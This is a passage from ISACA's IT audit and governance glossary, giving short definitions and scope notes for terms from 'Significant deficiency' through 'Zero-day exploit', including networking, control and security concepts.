
Significant deficiency
A deficiency or a combination of deficiencies, in internal control, that is less severe than a material weakness, yet important enough to merit attention by those responsible for oversight
Scope Note: A material weakness is a significant deficiency or a combination of significant deficiencies that results in more than a remote likelihood of an undesirable event(s) not being prevented or detected.

Sign on procedure
The procedure performed by a user to gain access to an application or operating system
Scope Note: If the user is properly identified and authenticated by the system's security, they will be able to access the software.

Simple failover
A failover process in which the primary node owns the resource group
Scope Note: The backup node runs a noncritical application (e.g., a development or test environment) and takes over the critical resource group, but not vice versa.

Simple Mail Transfer Protocol (SMTP)
The standard electronic mail (email) protocol on the Internet

Simple Object Access Protocol (SOAP)
A platform independent formatted protocol based on extensible markup language (XML) enabling applications to communicate with each other over the Internet
Scope Note: Use of SOAP may provide a significant security risk to web application operations because use of SOAP piggybacks onto a web based document object model and is transmitted via HyperText Transfer Protocol (HTTP) (port 80) to penetrate server firewalls, which are usually configured to accept port 80 and port 21 File Transfer Protocol (FTP) requests. Web based document models define how objects on a web page are associated with each other and how they can be manipulated while being sent from a server to a client browser. SOAP typically relies on XML for presentation formatting and also adds appropriate HTTP based headers to send it. SOAP forms the foundation layer of the web services stack, providing a basic messaging framework on which more abstract layers can build. There are several different types of messaging patterns in SOAP, but by far the most common is the Remote Procedure Call (RPC) pattern, in which one network node (the client) sends a request message to another node (the server) and the server immediately sends a response message to the

Single factor authentication (SFA)
Authentication process that requires only the user ID and password to grant access

Single point of failure
A resource whose loss will result in the loss of service or production

Skill
The learned capacity to achieve predetermined results
Scope Note: COBIT 5 perspective

Slack time (float)
Time in the project schedule, the use of which does not affect the project's critical path; the minimum time to complete the project based on the estimated time for each project segment and their relationships
Scope Note: Slack time is commonly referred to as "float" and generally is not "owned" by either party to the transaction.

SMART
Specific, measurable, attainable, realistic and timely, generally used to describe appropriately set goals

Smart card
A small electronic device that contains electronic memory, and possibly an embedded integrated circuit
Scope Note: Smart cards can be used for a number of purposes including the storage of digital certificates or digital cash, or they can be used as a token to authenticate users.

Sniff
The act of capturing network packets, including those not necessarily destined for the computer running the sniffing software

Sniffing
The process by which data traversing a network are captured or monitored

Social engineering
An attack based on deceiving users or administrators at the target site into revealing confidential or sensitive information

Software
Programs and supporting documentation that enable and facilitate use of the computer
Scope Note: Software controls the operation of the hardware and the processing of data.

Software as a service (SaaS)
Offers the capability to use the provider's applications running on cloud infrastructure. The applications are accessible from various client devices through a thin client interface such as a web browser (e.g., web based email).

Software as a service, platform as a service and infrastructure as a service (SPI)
The acronym used to refer to the three cloud delivery models

Source code
The language in which a program is written
Scope Note: Source code is translated into object code by assemblers and compilers. In some cases, source code may be converted automatically into another language by a conversion program. Source code is not executable by the computer directly. It must first be converted into a machine language.

Source code compare program
Provides assurance that the software being audited is the correct version of the software, by providing a meaningful listing of any discrepancies between the two versions of the program

Source document
The form used to record data that have been captured
Scope Note: A source document may be a piece of paper, a turnaround document or an image displayed for online data input.

Source lines of code (SLOC)
Often used in deriving single point software size estimations

Source routing specification
A transmission technique where the sender of a packet can specify the route that packet should follow through the network

Spam
Computer generated messages sent as unsolicited advertising

Spanning port
A port configured on a network switch to receive copies of traffic from one or more other ports on the switch

Spear phishing
An attack where social engineering techniques are used to masquerade as a trusted party to obtain important information such as passwords from the victim

Split data systems
A condition in which each of an enterprise's regional locations maintains its own financial and operational data while sharing processing with an enterprise wide, centralized database
Scope Note: Split data systems permit easy sharing of data while maintaining a certain level of autonomy.

Split domain name system (DNS)
An implementation of DNS that is intended to secure responses provided by the server such that different responses are given to internal vs. external users

Split knowledge/split key
A security technique in which two or more entities separately hold data items that individually convey no knowledge of the information that results from combining the items; a condition under which two or more entities separately have key components that individually convey no knowledge of the plaintext key that will be produced when the key components are combined in the cryptographic module

Spoofing
Faking the sending address of a transmission in order to gain illegal entry into a secure system

SPOOL (simultaneous peripheral operations online)
An automated function that can be based on an operating system or application in which electronic data being transmitted between storage areas are spooled or stored until the receiving device or storage area is prepared and able to receive the information
Scope Note: Spool allows more efficient electronic data transfers from one device to another by permitting higher speed sending functions, such as internal memory, to continue on with other operations instead of waiting on the slower speed receiving device, such as a printer.

Spyware
Software whose purpose is to monitor a computer user's actions (e.g., web sites visited) and report these actions to a third party, without the informed consent of that machine's owner or legitimate user
Scope Note: A particularly malicious form of spyware is software that monitors keystrokes to obtain passwords or otherwise gathers sensitive information such as credit card numbers, which it then transmits to a malicious third party. The term has also come to refer more broadly to software that subverts the computer's operation for the benefit of a third party.

SQL injection
Results from failure of the application to appropriately validate input. When specially crafted user controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. (MITRE)

Stage gate
A point in time when a program is reviewed and a decision is made to commit expenditures to the next set of activities on a program or project, to stop the work altogether, or to put a hold on execution of further work

Stakeholder
Anyone who has a responsibility for, an expectation from or some other interest in the enterprise.
Scope Note: Examples: shareholders, users, government, suppliers, customers and the public

Standard
A mandatory requirement, code of practice or specification approved by a recognized external standards organization, such as International Organization for Standardization (ISO)

Standing data
Permanent reference data used in transaction processing
Scope Note: These data are changed infrequently, such as a product price file or a name and address file.

Star topology
A type of local area network (LAN) architecture that utilizes a central controller to which all nodes are directly connected
Scope Note: With star topology, all transmissions from one station to another pass through the central controller which is responsible for managing and controlling all communication. The central controller often acts as a switching device.

Stateful inspection
A firewall architecture that tracks each connection traversing all interfaces of the firewall and makes sure they are valid.

Static analysis
Analysis of information that occurs on a noncontinuous basis; also known as interval based analysis

Statistical sampling
A method of selecting a portion of a population, by means of mathematical calculations and probabilities, for the purpose of making scientifically and mathematically sound inferences regarding the characteristics of the entire population

Statutory requirements
Laws created by government institutions

Storage area networks (SANs)
A variation of a local area network (LAN) that is dedicated for the express purpose of connecting storage devices to servers and other computing devices
Scope Note: SANs centralize the process for the storage and administration of data.

Strategic planning
The process of deciding on the enterprise's objectives, on changes in these objectives, and the policies to govern their acquisition and use

Strengths, weaknesses, opportunities and threats (SWOT)
A combination of an organizational audit listing the enterprise's strengths and weaknesses and an environmental scan or analysis of external opportunities and threats

Structured programming
A top down technique of designing programs and systems that makes programs more readable, more reliable and more easily maintained

Structured Query Language (SQL)
The primary language used by both application programmers and end users in accessing relational databases

Subject matter
The specific information subject to an IS auditor's report and related procedures, which can include things such as the design or operation of internal controls and compliance with privacy practices or standards or specified laws and regulations (area of activity)

Substantive testing
Obtaining audit evidence on the completeness, accuracy or existence of activities or transactions during the audit period

Sufficient audit evidence
Audit evidence is sufficient if it is adequate, convincing and would lead another IS auditor to form the same conclusions.

Sufficient evidence
The measure of the quantity of audit evidence; supports all material questions to the audit objective and scope
Scope Note: See evidence

Sufficient information: Information is sufficient when evaluators have gathered enough of it to form a reasonable conclusion. For information to be sufficient, however, it must first be suitable.
Scope Note: Refer to COBIT 5 information quality goals
Suitable information: Relevant (i.e., fit for its intended purpose), reliable (i.e., accurate, verifiable and from an objective source) and timely (i.e., produced and used in an appropriate time frame) information
Scope Note: Refer to COBIT 5 information quality goals
Supervisory control and data acquisition (SCADA): Systems used to control and monitor industrial and manufacturing processes, and utility facilities
Supply chain management (SCM): A concept that allows an enterprise to more effectively and efficiently manage the activities of design, manufacturing, distribution, service and recycling of products and service its customers
Surge suppressor: Filters out electrical surges and spikes
Suspense file: A computer file used to maintain information (transactions, payments or other events) until the proper disposition of that information can be determined
Scope Note: Once the proper disposition of the item is determined, it should be removed from the suspense file and processed in accordance with the proper procedures for that particular transaction. Two examples of items that may be included in a suspense file are receipt of a payment from a source that is not readily identified or data that do not yet have an identified match during migration to a new application.
Switches: Typically associated as a data link layer device, switches enable local area network (LAN) segments to be created and interconnected, which has the added benefit of reducing collision domains in Ethernet-based networks.
Symmetric key encryption: System in which a different key (or set of keys) is used by each pair of trading partners to ensure that no one else can read their messages
The same key is used for encryption and decryption. See also Private Key Cryptosystem.
Synchronize (SYN): A flag set in the initial setup packets to indicate that the communicating parties are synchronizing the sequence numbers used for the data transmission
Synchronous transmission: Block-at-a-time data transmission
System development life cycle (SDLC): The phases deployed in the development or acquisition of a software system
Scope Note: SDLC is an approach used to plan, design, develop, test and implement an application system or a major modification to an application system. Typical phases of SDLC include the feasibility study, requirements study, requirements definition, detailed design, programming, testing, installation and post-implementation review, but not the service delivery or benefits realization activities.
System exit: Special system software features and utilities that allow the user to perform complex system maintenance
Scope Note: Use of system exits often permits the user to operate outside of the security access control system.
System flowchart: Graphic representations of the sequence of operations in an information system or program
Scope Note: Information system flowcharts show how data from source documents flow through the computer to final distribution to users. Symbols used should be the internationally accepted standard. System flowcharts should be updated when necessary.
System hardening: A process to eliminate as many security risks as possible by removing all nonessential software programs, protocols, services and utilities from the system
System narrative: Provides an overview explanation of system flowcharts, with explanation of key control points and system interfaces
System of internal control: The policies, standards, plans and procedures, and organizational structures designed to provide reasonable assurance that enterprise objectives will be achieved and undesired events will be prevented or detected and corrected
Scope Note: COBIT 5 perspective
System software: A collection of computer programs used in the design, processing and control of all applications
Scope Note: The programs and processing routines that control the computer hardware, including the operating system and utility programs
System testing: Testing conducted on a complete, integrated system to evaluate the system's compliance with its specified requirements
Scope Note: System test procedures typically are performed by the system maintenance staff in their development library.
Systems acquisition process: Procedures established to purchase application software, or an upgrade, including evaluation of the supplier's financial stability, track record, resources and references from existing customers
Systems analysis: The systems development phase in which systems specifications and conceptual designs are developed based on end-user needs and requirements
Table lookup: Used to ensure that input data agree with predetermined criteria stored in a table
Tangible asset: Any asset that has physical form
Tape management system (TMS): A system software tool that logs, monitors and directs computer tape usage
Taps: Wiring devices that may be inserted into communication links for use with analysis probes, local area network (LAN) analyzers and intrusion detection security systems
Target: Person or asset selected as the aim of an attack
Tcpdump: A network monitoring and data acquisition tool that performs filter translation, packet acquisition and packet display
Technical infrastructure security: Refers to the security of the infrastructure that supports the enterprise resource planning (ERP) networking and telecommunications, operating systems, and databases
Technology infrastructure: Technology, human resources (HR) and facilities that enable the processing and use of applications
Technology infrastructure plan: A plan for the technology, human resources and facilities that enable the current and future processing and use of applications
Telecommunications: Electronic communication by special devices over distances or around devices that preclude direct interpersonal exchange
Teleprocessing: Using telecommunications facilities for handling and processing of computerized information
Telnet: Network protocol used to enable remote access to a server computer
Scope Note: Commands typed are run on the remote server.
Terminal Access Controller Access Control System Plus (TACACS+): An authentication protocol, often used by remote access servers
Terms of reference: A document that confirms a client's and an IS auditor's acceptance of a review assignment
Test data: Simulated transactions that can be used to test processing logic, computations and controls actually programmed in computer applications
Individual programs or an entire system can be tested.
Scope Note: This technique includes Integrated Test Facilities (ITFs) and Base Case System Evaluations (BCSEs).
Test generators: Software used to create data to be used in the testing of computer programs
Test programs: Programs that are tested and evaluated before approval into the production environment
Scope Note: Test programs, through a series of change control moves, migrate from the test environment to the production environment and become production programs.
Test types: Test types include:
- Checklist test: Copies of the business continuity plan (BCP) are distributed to appropriate personnel for review
- Structured walk-through: Identified key personnel walk through the plan to ensure that the plan accurately reflects the enterprise's ability to recover successfully
- Simulation test: All operational and support personnel are expected to perform a simulated emergency as a practice session
- Parallel test: Critical systems are run at an alternate site (hot, cold, warm or reciprocal)
- Complete interruption test: Disaster is replicated; normal production is shut down with a real-time recovery process
Testing: The examination of a sample from a population to estimate characteristics of the population
Third-party review: An independent audit of the control structure of a service organization, such as a service bureau, with the objective of providing assurance to the users of the service organization that the internal control structure is adequate, effective and sound
Threat: Anything (e.g., object, substance, human) that is capable of acting against an asset in a manner that can result in harm
Scope Note: A potential cause of an unwanted incident (ISO/IEC 13335)
Threat agent: Methods and things used to exploit a vulnerability
Scope Note: Examples include determination, capability, motive and resources.
Threat analysis: An evaluation of the type, scope and nature of events or actions that can result in adverse consequences; identification of the threats that exist against enterprise assets
Scope Note: The threat analysis usually defines the level of threat and the likelihood of it materializing.
Threat event: Any event during which a threat element/actor acts against an asset in a manner that has the potential to directly result in harm
Threat vector: The path or route used by the adversary to gain access to the target
Throughput: The quantity of useful work made by the system per unit of time. Throughput can be measured in instructions per second or some other unit of performance. When referring to a data transfer operation, throughput measures the useful data transfer rate and is expressed in kbps, Mbps and Gbps.
Timelines: Chronological graphs where events related to an incident can be mapped to look for relationships in complex cases
Scope Note: Timelines can provide simplified visualization for presentation to management and other nontechnical audiences.
Timely information: Produced and used in a time frame that makes it possible to prevent or detect control deficiencies before they become material to an enterprise
Scope Note: Refer to COBIT 5 information quality goals
Token: A device that is used to authenticate a user, typically in addition to a username and password
Scope Note: A token is usually a device the size of a credit card that displays a pseudorandom number that changes every few minutes.
Token ring topology: A type of local area network (LAN) ring topology in which a frame containing a specific format, called the token, is passed from one station to the next around the ring
Scope Note: When a station receives the token, it is allowed to transmit. The station can send as many frames as desired until a predefined time limit is reached. When a station either has no more frames to send or reaches the time limit, it transmits the token. Token passing prevents data collisions that can occur when two computers begin transmitting at the same time.
Tolerable error: The maximum error in the population that professionals are willing to accept and still conclude that the test objective has been achieved. For substantive tests, tolerable error is related to professionals' judgement about materiality. In compliance tests, it is the maximum rate of deviation from a prescribed control procedure that the professionals are willing to accept
Top-level management: The highest level of management in the enterprise, responsible for direction and control of the enterprise as a whole (such as director, general manager, partner, chief officer and executive manager)
Topology: The physical layout of how computers are linked together
Scope Note: Examples of topology include ring, star and bus.
Total cost of ownership (TCO): Includes the original cost of the computer plus the cost of: software, hardware and software upgrades, maintenance, technical support, training, and certain activities performed by users
Transaction: Business events or information grouped together because they have a single or similar purpose
Scope Note: Typically, a transaction is applied to a calculation or event that then results in the updating of a holding or master file.
Transaction log: A manual or automated log of all updates to data files and databases
Transaction protection: Also known as "automated remote journaling of redo logs," a data recovery strategy that is similar to electronic vaulting except that instead of transmitting several transaction batches daily, the archive logs are shipped as they are created
Transmission Control Protocol (TCP): A connection-based Internet protocol that supports reliable data transfer connections
Scope Note: Packet data are verified using checksums and retransmitted if they are missing or corrupted. The application plays no part in validating the transfer.
Transmission Control Protocol/Internet Protocol (TCP/IP): Provides the basis for the Internet; a set of communication protocols that encompass media access, packet transport, session communication, file transfer, electronic mail (email), terminal emulation, remote file access and network management
Transparency: Refers to an enterprise's openness about its activities and is based on the following concepts:
- How the mechanism functions is clear to those who are affected by or want to challenge governance decisions.
- A common vocabulary has been established.
- Relevant information is readily available.
Scope Note: Transparency and stakeholder trust are directly related; the more transparency in the governance process, the more confidence in the governance.
Transport Layer Security (TLS): A protocol that provides communications privacy over the Internet. The protocol allows client/server applications to communicate in a way that is designed to prevent eavesdropping, tampering, or message forgery. (RFC 2246)
Scope Note: Transport Layer Security (TLS) is composed of two layers: the TLS Record Protocol and the TLS Handshake Protocol. The TLS Record Protocol provides connection security with some encryption method such as the Data Encryption Standard (DES). The TLS Record Protocol can also be used without encryption. The TLS Handshake Protocol allows the server and client to authenticate each other and to negotiate an encryption algorithm and cryptographic keys before data is exchanged.
Trapdoor: Unauthorized electronic exit, or doorway, out of an authorized computer program into a set of malicious instructions or programs
Triple DES (3DES): A block cipher created from the Data Encryption Standard (DES) cipher by using it three times
Trojan horse: Purposefully hidden malicious or damaging code within an authorized computer program
Scope Note: Unlike viruses, they do not replicate themselves, but they can be just as destructive to a single computer.
Trusted process: A process certified as supporting a security goal
Trusted system: A system that employs sufficient hardware and software assurance measures to allow their use for processing a range of sensitive or classified information
Tunnel: The paths that the encapsulated packets follow in an Internet virtual private network (VPN)
Tunnel mode: Used to protect traffic between different networks when traffic must travel through intermediate or untrusted networks. Tunnel mode encapsulates the entire IP packet with an AH or ESP header and an additional IP header.
Tunneling: Commonly used to bridge between incompatible hosts/routers or to provide encryption, a method by which one network protocol encapsulates another protocol within itself
Scope Note: When protocol A encapsulates protocol B, a protocol A header and optional tunneling headers are appended to the original protocol B packet. Protocol A then becomes the data link layer of protocol B. Examples of tunneling protocols include IPSec, Point-to-Point Protocol over Ethernet (PPPoE) and Layer 2 Tunneling Protocol (L2TP).
Tuple: A row or record consisting of a set of attribute value pairs (column or field) in a relational data structure
Twisted pair: A low-capacity transmission medium; a pair of small, insulated wires that are twisted around each other to minimize interference from other wires in the cable
Two-factor authentication: The use of two independent mechanisms for authentication (e.g., requiring a smart card and a password); typically the combination of something you know, are or have
Uncertainty: The difficulty of predicting an outcome due to limited knowledge of all components
Unicode: A standard for representing characters as integers
Scope Note: Unicode uses 16 bits, which means that it can represent more than 65,000 unique characters; this is necessary for languages such as Chinese and Japanese.
Uniform resource locator (URL): The string of characters that form a web address
Unit testing: A testing technique that is used to test program logic within a particular program or module
Scope Note: The purpose of the test is to ensure that the internal operation of the program performs according to specification. It uses a set of test cases that focus on the control structure of the procedural design.
Universal description, discovery and integration (UDDI): A web-based version of the traditional telephone book's yellow and white pages enabling businesses to be publicly listed in promoting greater e-commerce activities
Universal Serial Bus (USB): An external bus standard that provides capabilities to transfer data at a rate of 12 Mbps
Scope Note: A USB port can connect up to 127 peripheral devices.
UNIX: A multi-user, multitasking operating system that is used widely as the master control program in workstations and especially servers
Untrustworthy host: A host is referred to as untrustworthy because it cannot be protected by the firewall; therefore, hosts on trusted networks can place only limited trust in it.
Scope Note: To the basic border firewall, add a host that resides on an untrusted network where the firewall cannot protect it. That host is minimally configured and carefully managed to be as secure as possible. The firewall is configured to require incoming and outgoing traffic to go through the untrustworthy host.
Uploading: The process of electronically sending computerized information from one computer to another computer
Scope Note: When uploading, most often the transfer is from a smaller computer to a larger one.
User awareness: A training process in security-specific issues to reduce security problems; users are often the weakest link in the security chain.
User Datagram Protocol (UDP): A connectionless Internet protocol that is designed for network efficiency and speed at the expense of reliability
Scope Note: A data request by the client is served by sending packets without testing to verify whether they actually arrive at the destination, nor whether they were corrupted in transit. It is up to the application to determine these factors and request retransmissions.
User interface impersonation: Can be a pop-up ad that impersonates a system dialog, an ad that impersonates a system warning, or an ad that impersonates an application user interface in a mobile device.
User mode: Used for the execution of normal system activities
User provisioning: A process to create, modify, disable and delete user accounts and their profiles across IT infrastructure and business applications
Utility programs: Specialized system software used to perform particular computerized functions and routines that are frequently required during normal processing
Scope Note: Examples of utility programs include sorting, backing up and erasing data.
Utility script: A sequence of commands input into a single file to automate a repetitive and specific task
Scope Note: The utility script is executed, either automatically or manually, to perform the task. In UNIX, these are known as shell scripts.
Utility software: Computer programs provided by a computer hardware manufacturer or software vendor and used in running the system
Scope Note: This technique can be used to examine processing activities; to test programs, system activities and operational procedures; to evaluate data file activity; and to analyze job accounting data.
Vaccine: A program designed to detect computer viruses
Val IT: The standard framework for enterprises to select and manage IT-related business investments and IT assets by means of investment programs such that they deliver the optimal value to the enterprise
Based on COBIT.
Validity check: Programmed checking of data validity in accordance with predetermined criteria
Value: The relative worth or importance of an investment for an enterprise, as perceived by its key stakeholders, expressed as total life cycle benefits net of related costs, adjusted for risk and (in the case of financial value) the time value of money
Value creation: The main governance objective of an enterprise, achieved when the three underlying objectives (benefits realization, risk optimization and resource optimization) are all balanced
Scope Note: COBIT 5 perspective
Value-added network (VAN): A data communication network that adds processing services such as error correction, data translation and/or storage to the basic function of transporting data
Variable sampling: A sampling technique used to estimate the average or total value of a population based on a sample; a statistical model used to project a quantitative characteristic, such as a monetary amount
Verification: Checks that data are entered correctly
Vertical defense in depth: Controls are placed at different system layers: hardware, operating system, application, database or user levels
Virtual local area network (VLAN): Logical segmentation of a LAN into different broadcast domains
Scope Note: A VLAN is set up by configuring ports on a switch, so devices attached to these ports may communicate as if they were attached to the same physical network segment, although the devices are located on different LAN segments. A VLAN is based on logical rather than physical connections.
Virtual organizations: Organization that has no official physical site presence and is made up of diverse, geographically dispersed or mobile employees
Virtual private network (VPN): A secure private network that uses the public telecommunications infrastructure to transmit data
Scope Note: In contrast to a much more expensive system of owned or leased lines that can only be used by one company, VPNs are used by enterprises for both extranets and wide areas of intranets. Using encryption and authentication, a VPN encrypts all data that pass between two Internet points, maintaining privacy and security.
Virtual private network (VPN) concentrator: A system used to establish VPN tunnels and handle large numbers of simultaneous connections. This system provides authentication, authorization and accounting services.
Virtualization: The process of adding a "guest application" and data onto a "virtual server," recognizing that the guest application will ultimately part company from this physical server
Virus: A program with the ability to reproduce by modifying other programs to include a copy of itself
Scope Note: A virus may contain destructive code that can move into multiple programs, data files or devices on a system and spread through multiple systems in a network.
Virus signature file: The file of virus patterns that are compared with existing files to determine whether they are infected with a virus or worm
Voice mail: A system of storing messages in a private recording medium which allows the called party to later retrieve the messages
Voice-over Internet Protocol (VoIP): Also called IP Telephony, Internet Telephony and Broadband Phone, a technology that makes it possible to have a voice conversation over the Internet or over any dedicated Internet Protocol (IP) network instead of over dedicated voice transmission lines
Volatile data: Data that changes frequently and can be lost when the system's power is shut down
Vulnerability: A weakness in the design, implementation, operation or internal control of a process that could expose the system to adverse threats from threat events
Vulnerability analysis: A process of identifying and classifying vulnerabilities
Vulnerability event: Any event during which a material increase in vulnerability results
Note that this increase in vulnerability can result from changes in control conditions or from changes in threat capability/force.
Scope Note: From Jones, J.; "FAIR Taxonomy," Risk Management Insight, USA, 2008
Vulnerability scanning: An automated process to proactively identify security weaknesses in a network or individual system
Walk-through: A thorough demonstration or explanation that details each step of a process
War dialer: Software packages that sequentially dial telephone numbers, recording any numbers that answer
Warm site: Similar to a hot site but not fully equipped with all of the necessary hardware needed for recovery
Waterfall development: Also known as traditional development, a procedure-focused development cycle with formal sign-off at the completion of each level
Web hosting: The business of providing the equipment and services required to host and maintain files for one or more web sites and provide fast Internet connections to those sites
Scope Note: Most hosting is "shared," which means that web sites of multiple companies are on the same server to share/reduce costs.
Web page: A viewable screen displaying information, presented through a web browser in a single view, sometimes requiring the user to scroll to review the entire page
Scope Note: An enterprise's web page may display the enterprise's logo, provide information about the enterprise's products and services, or allow a customer to interact with the enterprise or third parties that have contracted with the enterprise.
Web server: Using the client-server model and the World Wide Web's HyperText Transfer Protocol (HTTP), a web server is a software program that serves web pages to users.
Web Services Description Language (WSDL): A language formatted with extensible markup language (XML)
Used to describe the capabilities of a web service as collections of communication endpoints capable of exchanging messages; WSDL is the language used by Universal Description, Discovery and Integration (UDDI). See also Universal Description, Discovery and Integration (UDDI).
Web site: Consists of one or more web pages that may originate at one or more web server computers
Scope Note: A person can view the pages of a web site in any order, as he/she would read a magazine.
Well-known ports: Well-known ports 0 through 1023: Controlled and assigned by the Internet Assigned Numbers Authority (IANA), and on most systems can be used only by system (or root) processes or by programs executed by privileged users. The assigned ports use the first portion of the possible port numbers. Initially, these assigned ports were in the range 0-255. Currently, the range for assigned ports managed by the IANA has been expanded to the range 0-1023.
White box testing: A testing approach that uses knowledge of a program/module's underlying implementation and code intervals to verify its expected behavior
Wide area network (WAN): A computer network connecting different remote locations that may range from short distances, such as a floor or building, to extremely long transmissions that encompass a large region or several countries
Wide area network (WAN) switch: A data link layer device used for implementing various WAN technologies such as asynchronous transfer mode, point-to-point frame relay solutions, and integrated services digital network (ISDN).
Scope Note: WAN switches are typically associated with carrier networks providing dedicated WAN switching and router services to enterprises via T1 or T3 connections.
WiFi Protected Access (WPA): A class of systems used to secure wireless (WiFi) computer networks
Scope Note: WPA was created in response to several serious weaknesses that researchers found in the previous system, Wired Equivalent Privacy (WEP). WPA implements the majority of the IEEE 802.11i standard, and was intended as an intermediate measure to take the place of WEP while 802.11i was prepared. WPA is designed to work with all wireless network interface cards, but not necessarily with first-generation wireless access points. WPA2 implements the full standard, but will not work with some older network cards. Both provide good security with two significant issues. First, either WPA or WPA2 must be enabled and chosen in preference to WEP; WEP is usually presented as the first security choice in most installation instructions. Second, in the "personal" mode, the most likely choice for homes and small offices, a passphrase is required that, for full security, must be longer than the typical six to eight character passwords users are taught to employ.
WiFi Protected Access II (WPA2): Wireless security protocol that supports 802.11i encryption standards to provide greater security. This protocol uses Advanced Encryption Standard (AES) and Temporal Key Integrity Protocol (TKIP) for stronger encryption.
Windows NT: A version of the Windows operating system that supports preemptive multitasking
Wired Equivalent Privacy (WEP): A scheme that is part of the IEEE 802.11 wireless networking standard to secure IEEE 802.11 wireless networks (also known as WiFi networks)
Scope Note: Because a wireless network broadcasts messages using radio, it is particularly susceptible to eavesdropping. WEP was intended to provide comparable confidentiality to a traditional wired network (in particular, it does not protect users of the network from each other), hence the name. Several serious weaknesses were identified by cryptanalysts, and WEP was superseded by WiFi Protected Access (WPA) in 2003, and then by the full IEEE 802.11i standard (also known as WPA2) in 2004. Despite the weaknesses, WEP provides a level of security that can deter casual snooping.
Wireless computing: The ability of computing devices to communicate in a form to establish a local area network (LAN) without cabling infrastructure (wireless), and involves those technologies converging around IEEE 802.11 and 802.11b and radio band services used by mobile devices
Wireless local area network (WLAN): Two or more systems networked using a wireless distribution method
Wiretapping: The practice of eavesdropping on information being transmitted over telecommunications links
World Wide Web (WWW): A sub-network of the Internet through which information is exchanged by text, graphics, audio and video
World Wide Web Consortium (W3C): An international consortium founded in 1994 of affiliates from public and private organizations involved with the Internet and the web
Scope Note: The W3C's primary mission is to promulgate open standards to further enhance the economic growth of Internet web services globally.
Worm: A programmed network attack in which a self-replicating program does not attach itself to programs, but rather spreads independently of users' action
Write blocker: A device that allows the acquisition of information on a drive without creating the possibility of accidentally damaging the drive
Write protect: The use of hardware or software to prevent data from being overwritten or deleted
X.25: A protocol for packet-switching networks
X.25 Interface: An interface between data terminal equipment (DTE) and data circuit-terminating equipment (DCE) for terminals operating in the packet mode on some public data networks
X.500: A standard that defines how global directories should be structured
Scope Note: X.500 directories are hierarchical with different levels for each category of information, such as country, state and city.
Zero-day exploit: A vulnerability that is exploited before the software creator/vendor is even aware of its existence
Revised 1 June 2014
2014 ISACA. All rights reserved. ISACA Glossary of Terms
